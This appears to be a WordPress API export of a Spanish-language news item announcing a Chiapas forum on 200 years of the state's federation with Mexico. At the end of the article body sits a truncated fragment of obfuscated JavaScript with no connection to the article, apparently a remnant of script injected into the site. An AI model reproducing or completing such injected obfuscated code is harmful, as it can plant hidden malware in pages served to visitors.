{"id":17727,"date":"2024-09-09T04:32:01","date_gmt":"2024-09-09T04:32:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17727"},"modified":"2024-09-09T04:32:02","modified_gmt":"2024-09-09T04:32:02","slug":"foro-chiapas-resistencia-y-utopia-abordara-200-anos-de-la-federacion-de-chiapas-a-mexico","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17727","title":{"rendered":"Foro &#8220;Chiapas: Resistencia y Utop\u00eda&#8221; abordar\u00e1 200 a\u00f1os de la Federaci\u00f3n de Chiapas a M\u00e9xico"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"815\" height=\"573\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0008.jpg\" alt=\"\" class=\"wp-image-17728\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0008.jpg 815w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0008-300x211.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240908-WA0008-768x540.jpg 768w\" sizes=\"auto, (max-width: 815px) 100vw, 815px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>8 de septiembre del 2024. San Crist\u00f3bal de Las Casas-. El pr\u00f3ximo 14 de septiembre se llevar\u00e1 a cabo el Foro Chiapas: Resistencia y Utop\u00eda, un evento clave para el an\u00e1lisis hist\u00f3rico y sociol\u00f3gico de la entidad, en el marco de los 200 a\u00f1os de la Federaci\u00f3n de Chiapas en M\u00e9xico. La jornada se desarrollar\u00e1 a partir de las 9:00 de la ma\u00f1ana en la Cerrada Alas de \u00c1guila, ubicada en el Barrio del Santuario, de esta ciudad.<\/p>\n\n\n\n<p>Esdras Alonso, l\u00edder de la congregaci\u00f3n Alas de \u00c1guila, convoc\u00f3 a expertos y organizaciones para llevar a cabo ponencias y an\u00e1lisis sobre diversos temas de relevancia local y nacional. Alonso destac\u00f3 la importancia de aprovechar este espacio para dialogar y reflexionar sobre aspectos fundamentales como la diversidad cultural, la educaci\u00f3n, la diversidad religiosa y ling\u00fc\u00edstica que caracterizan a Chiapas.<\/p>\n\n\n\n<p>\u201cEl 14 de septiembre es un buen marco para analizar los 200 a\u00f1os de la Federaci\u00f3n de Chiapas a M\u00e9xico, entre otros temas que se dan a nivel nacional. Vale la pena, los ponentes tienen el nivel necesario para hacer de este ejercicio un evento de mucho provecho\u201d, se\u00f1al\u00f3 Alonso, subrayando el valor de la conversaci\u00f3n y la retroalimentaci\u00f3n en estos espacios.<\/p>\n\n\n\n<p>Entre las organizaciones participantes se encuentran Nuevo Pa\u00eds, el Ej\u00e9rcito de Dios y diversos acad\u00e9micos que han contribuido al an\u00e1lisis de la trayectoria social e hist\u00f3rica de la regi\u00f3n. La colaboraci\u00f3n entre estas instituciones y la academia promete generar un di\u00e1logo enriquecedor para los asistentes.<\/p>\n\n\n\n<p>&#8220;El foro se perfila como una oportunidad \u00fanica para reflexionar sobre el pasado y presente de Chiapas, y su relevancia dentro del panorama nacional, a trav\u00e9s de una mirada cr\u00edtica y plural&#8221;, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 8 de septiembre del 2024. San Crist\u00f3bal de Las Casas-. El pr\u00f3ximo 14 de septiembre se llevar\u00e1 a cabo el Foro Chiapas: Resistencia y Utop\u00eda, un evento clave para el an\u00e1lisis hist\u00f3rico y sociol\u00f3gico de la entidad, en el marco de los 200 a\u00f1os de la Federaci\u00f3n de Chiapas en M\u00e9xico. La &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17728,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17727","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17727","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17727"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17727\/revisions"}],"predecessor-version":[{"id":17729,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17727\/revisions\/17729"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17728"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17727"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17727"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17727"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}